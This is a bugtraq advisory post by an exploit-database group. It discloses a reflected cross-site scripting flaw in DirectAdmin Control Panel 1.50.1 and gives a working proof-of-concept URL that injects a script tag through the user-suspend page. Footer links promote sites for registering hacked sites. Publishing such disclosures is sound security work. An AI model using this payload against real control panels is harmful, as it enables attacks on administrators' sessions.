
Date: Tue, 10 Jan 2017 14:40:48 GMT
From: iedb.team@...il.com
To: bugtraq@...urityfocus.com
Subject: Directadmin ControlPanel 1.50.1 Cross-Site-Scripting Vulnerability

DirectAdmin Control Panel version 1.50.1 suffers from a cross site scripting vulnerability.


#################################

#
#     @@@    @@@@@@@@@@@    @@@@@           @@@@@@@@@@            @@@  @@@@@@@
#     @@@    @@@@@@@@@@@    @@@  @@         @@@     @@            @@@  @@@@@@@@  
#     @@@    @@@            @@@    @@       @@@       @@          @@@  @@@  @@@  
#     @@@    @@@            @@@      @@     @@@     @@            @@@  @@@  @@@  
#     @@@    @@@@@@@@@@@    @@@       @     @@@@@@@@@@            @@@  @@@@@@
#     @@@    @@@@@@@@@@@    @@@     @@      @@@     @@            @@@  @@@@@@
#     @@@    @@@            @@@   @@        @@@       @@   @@@    @@@  @@@ @@@
#     @@@    @@@            @@@ @@          @@@     @@     @@@    @@@  @@@  @@@
#     @@@    @@@@@@@@@@@    @@@@@           @@@@@@@@@@     @@@    @@@  @@@   @@@
#

#####################################

#####################################

#                Iranian Exploit DataBase

# Directadmin ControlPanel 1.50.1 Cross-Site-Scripting Vulnerability

# Directadmin Version : 1.50.1 And Old Version

# Testet On : Centos 6 - Directadmin 1.50.1

# Vendor site : http://www.directadmin.com

# Pic : http://iedb.ir/img/bug-directadmin-iedb.ir.jpg

# Author : Amir ( iedb.team@...il.com - https://telegram.me/AmirAm67)

# Site : IeDb.Ir  -  irist.ir   -   xssed.Ir

# Iedb Telegram : https://telegram.me/iedbteam

# Archive Exploit = http://iedb.ir/exploits-6523.html

#####################################

Description :

A client side cross site scripting vulnerability is detected on DirectAdmins Management Web-Application.
The exploit, to allow the user to execute a script.
The bug, on page Suspend and UnSuspend a user or by the manager (admin or reseller).

Bug :

http://ip:2222/CMD_ALL_USER_SHOW

SusPend User And Insert Xss Code :

http://ip:2222/CMD_SELECT_USERS?select3=irist.ir(site)&dosuspend=Suspend&reason=none&location=CMD_ALL_USER_SHOW'"><script>alert(/IrIsT.Ir/)</script>

Pic For This Bug : http://iedb.ir/img/bug-directadmin-iedb.ir.jpg

#####################################

** http://iedb.ir  ==>> Iranian Exploit DataBase And Iranian Security Team

** http://irist.ir  ==>> Register hacked sites

** http://xssed.Ir  ==>>  Sign vulnerable sites ( xss and sql ) (Vulnerability attack information site)

Thanks to : C0dex,B3hz4d,Beni_vanda,Mr_time,Bl4ck M4n,black_security,Yasser,Ramin Assadian,Black_Nofuzi,SecureHost,1TED,Mr_Kelever,Mr_keeper,Mahmod,Iedb,Khashayar,B3hz4d4,Shabgard,Cl09er,

Be_lucky,Moslem Haghighian,Dr_Iman,8Bit,Javid,Esmiley_Amir,Mahdi_feizezade,Amin_Zohrabi,Shellshock3 And all my friends And All Member In Iedb.Ir Team

#####################################

#  Archive Exploit = http://iedb.ir/exploits-6523.html

#####################################
